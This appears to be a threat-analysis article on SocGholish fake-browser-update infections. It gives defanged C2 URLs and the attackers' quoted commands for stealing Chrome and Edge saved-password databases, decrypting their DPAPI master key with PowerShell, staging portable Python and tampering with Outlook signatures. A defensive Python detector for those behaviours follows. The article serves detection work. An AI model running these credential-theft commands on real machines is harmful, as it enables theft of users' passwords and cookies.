Enterprises are being targeted by the malware known as SocGholish through deceptive browser update prompts.
SocGholish, notorious for its stealth and the complexity of its delivery chain, has been identified in a series of incidents in which fake browser update prompts trick users into downloading malicious payloads.
eSentire has recently published a report detailing the infiltration of enterprises by SocGholish, which is spreading through fake browser updates and causing significant security concerns for organizations.
The Infection Vector: Compromised Websites
The initial stage of the SocGholish attack involves compromising legitimate websites, where attackers inject malicious JavaScript code.
Unsuspecting users visiting these websites receive pop-up notifications urging them to download browser updates.
These prompts, however, are cleverly disguised traps.
The downloaded file, typically named “Update.js,” harbors the SocGholish malware, initiating the infection process upon execution.
The SocGholish malware employs sophisticated evasion techniques to avoid detection by automated analysis tools.
For instance, it checks for browser automation frameworks such as Selenium through the browser's "navigator.webdriver" property, which is set to true when the browser is driven by WebDriver.
If the property is set, the script halts before doing anything further, so sandboxes that rely on automated browsing never observe the later stages.
Upon successful evasion, SocGholish proceeds to execute its payload.
Example URLs embedded in the script include:
hxxps://ghost.blueecho88[.]com/XnkKYSVbaQg6WzBTaU0mQy0NbxF8QygRLBxpCTsaYT40ClUHLBZkFTsLeA4sWyZDOwt4DixbMFByW3hDZFtvBy4JbEMj
hxxps://ghost.blueecho88[.]com/U5WuWyi3zTI3t5RpZKGCeSDhyytxr4wrIfDNMzb2xQQ55vE9IfrALzbn3DQht4J5NufcNCG3lGl/t9x5abfKNz3wxDAl/cw3NeXXPDG30w==
hxxps://ghost.blueecho88[.]com/gcGKZ/rj6Q7l47BVtvWmRfK17xej+6gG76DmHvuk1QHx46ZF8+OwReumqBo=
It employs a multi-stage infection process, beginning with the execution of obfuscated JavaScript that downloads additional malicious scripts only under specific conditions, such as user interaction or the presence of WordPress cookies indicating an administrator session (a signal that the visitor can be used to compromise further sites).
The script then sends a POST request to hxxps://tfuq.register.arpsychotherapy.com/editContent using the "send" method, with the body "lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==".
Post-Exploitation Activity
Following the initial compromise, the attackers engaged in hands-on-keyboard activity, starting with the collection of the stored-password databases ("Login Data", a SQLite file) of Google Chrome and Microsoft Edge. The files were appended to temporary files for later exfiltration using the following commands:
"C:\Windows\System32\cmd.exe" /C type "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" >> "C:\Users\username\AppData\Local\Temp\2\radC7958.tmp"
"C:\Windows\System32\cmd.exe" /C type "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" >> "C:\Users\username\AppData\Local\Temp\2\rad01734.tmp"
Shortly after, another command copied the Login Data files of both Edge and Chrome into a different user's Downloads directory, redirecting output and errors to a temporary file (username is the primary infected user, username_2 is another user on the same machine):
"C:\Windows\System32\cmd.exe" /C copy "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" C:\users\username_2\Downloads\395edg.bin & copy "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" C:\users\username_2\Downloads\396chr.bin >> "C:\Users\username\AppData\Local\Temp\2\rad5914F.tmp"
Staging copies of the credential databases under a second user's profile is likely done for redundancy in case the primary files are discovered and removed.
The threat actors then used PowerShell to run a base64-encoded command.
The decoded command reads the "encrypted_key" value from each browser's Local State file, base64-decodes it, strips the five-byte "DPAPI" prefix ($3[5..($3.length-1)]), and calls ProtectedData.Unprotect under the current user's DPAPI scope to recover the AES key with which Chrome and Edge encrypt saved passwords and cookies.
The recovered key is written to a throwaway temporary file; the stolen Login Data files can then be decrypted offline.
The decoded commands:
"C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:\Users\username\AppData\Local\Temp\2\rad1F269.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:\Users\username\AppData\Local\Temp\2\rad65036.tmp"
After that, the attackers made ten attempts to run a PowerShell command that downloads, extracts and configures the embeddable (portable) Windows build of Python 3.12 under the "AppData\Local\ConnectedDevicesPlatform" path of the infected user, so that further Python payloads can be run without installing anything system-wide. Renaming python312._pth to python312.pth lifts the isolated sys.path configuration of the embeddable build, so get-pip.py and pip-installed packages work from that directory.
powershell -c "wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;ls C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;Expand-Archive -LiteralPath C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip -DestinationPath C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa;rm C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;ls C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa;wget https://bootstrap.pypa.io/get-pip.py -OutFile C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa\get-pip.py;cd C:\Users\username\AppData\Local\ConnectedDevicesPlatform\pypa;mkdir DLLs;ren python312._pth python312.pth"
The attackers then used PowerShell to run a base64-encoded command that modified the HTML signature files used by Microsoft Outlook, an established way to inject content into every outgoing email.
"C:\Windows\System32\cmd.exe" /C powershell.exe -encodedCommand Get-ChildItem -Path $env:APPDATA\Microsoft\Signatures -Filter *.htm | ForEach-Object { (Get-Content $_.FullName) -replace '
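The post-exploitation commands above all show up in process-creation telemetry (Sysmon Event ID 1, Security 4688), but the DPAPI key theft and the signature tampering are only visible once the -EncodedCommand payload is decoded. The following detector is an added example written for this page, not eSentire's tooling or SocGholish code: it decodes encoded PowerShell and then applies one rule per behaviour the report describes. The rule names are my own, and the sample events are constructed from the commands quoted above (the Outlook sample completes the truncated command with a placeholder -replace, since the page does not show the rest).

```python
"""Hunt for the SocGholish hands-on-keyboard activity described on this page
in process-creation command lines. Added example; the events below are
constructed from the commands quoted in the article, not real telemetry."""
import base64
import re
from typing import List, Optional

# -EncodedCommand payloads are base64 over UTF-16LE; decode them before
# matching, otherwise the DPAPI rule below never fires on the raw command line.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# One rule per behaviour reported on the page; every pattern in a rule must match.
RULES = {
    # cmd /C type|copy ...\Chrome|Edge\User Data\Default\Login Data
    "browser_login_data_staging": [
        re.compile(r"\bcmd\.exe.?\s+/c\s+(?:type|copy)\b", re.IGNORECASE),
        re.compile(r"(?:Chrome|Edge)\\User Data\\Default\\Login Data", re.IGNORECASE),
    ],
    # Local State -> encrypted_key -> ProtectedData::Unprotect (browser master key)
    "dpapi_master_key_decrypt": [
        re.compile(r"Local State.*encrypted_key.*ProtectedData\]::Unprotect", re.IGNORECASE | re.DOTALL),
    ],
    # embeddable Python dropped under ConnectedDevicesPlatform
    "portable_python_staging": [
        re.compile(r"python-[\d.]+-embed-amd64\.zip.*ConnectedDevicesPlatform", re.IGNORECASE),
    ],
    # rewriting Outlook signature .htm files in place
    "outlook_signature_tamper": [
        re.compile(r"Microsoft\\Signatures.*-Filter \*\.htm.*-replace", re.IGNORECASE),
    ],
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by `powershell -enc <b64>`, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def classify(cmdline: str) -> List[str]:
    """Names of every rule matched by the command line plus its decoded payload, if any."""
    hits = []
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    if decoded is not None:
        hits.append("encoded_powershell")  # low signal alone, useful as context
    for name, patterns in RULES.items():
        if all(p.search(text) for p in patterns):
            hits.append(name)
    return hits


def scan(events: List[str]) -> List[List[str]]:
    """Classify a batch of command lines; one hit list per event, in order."""
    return [classify(e) for e in events]


# Constructed samples modelled on the commands quoted on this page.
DPAPI_SCRIPT = (
    '$1 = (gc "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State").split(\',\')| select-string encrypted_key; '
    "$2 = $1 -replace '\"}', '' -replace '\"encrypted_key\":\"','';"
    "Add-Type -AssemblyName System.Security;$3 = [System.Convert]::FromBase64String($2);"
    "$3 = $3[5..($3.length-1)];"  # drops the 5-byte 'DPAPI' prefix on the stored key
    "$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,"
    "[Security.Cryptography.DataProtectionScope]::CurrentUser)"
)
SAMPLE_EVENTS = [
    '"C:\\Windows\\System32\\cmd.exe" /C type "C:\\Users\\username\\AppData\\Local\\Google\\Chrome'
    '\\User Data\\Default\\Login Data" >> "C:\\Users\\username\\AppData\\Local\\Temp\\2\\radC7958.tmp"',
    '"C:\\Windows\\System32\\cmd.exe" /C powershell -enc ' + encode_command(DPAPI_SCRIPT),
    'powershell -c "wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip '
    '-OutFile C:\\Users\\username\\AppData\\Local\\ConnectedDevicesPlatform\\python.zip"',
    "powershell.exe -encodedCommand " + encode_command(  # placeholder -replace; page's command is truncated
        "Get-ChildItem -Path $env:APPDATA\\Microsoft\\Signatures -Filter *.htm | "
        "ForEach-Object { (Get-Content $_.FullName) -replace 'a','b' | Set-Content $_.FullName }"),
    '"C:\\Windows\\System32\\cmd.exe" /C type C:\\Users\\username\\notes.txt',  # benign
    "powershell -enc " + encode_command("Get-Date"),                           # benign but encoded
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(hits or ["-"], event[:70])
```

The rules are deliberately behaviour-based (file names, the Unprotect call, the embed zip landing in a non-standard path) rather than keyed on the rad*.tmp names or the C2 domains, which change per intrusion; a production version would run the same logic over the EDR or SIEM command-line field and treat "encoded_powershell" as context rather than an alert on its own.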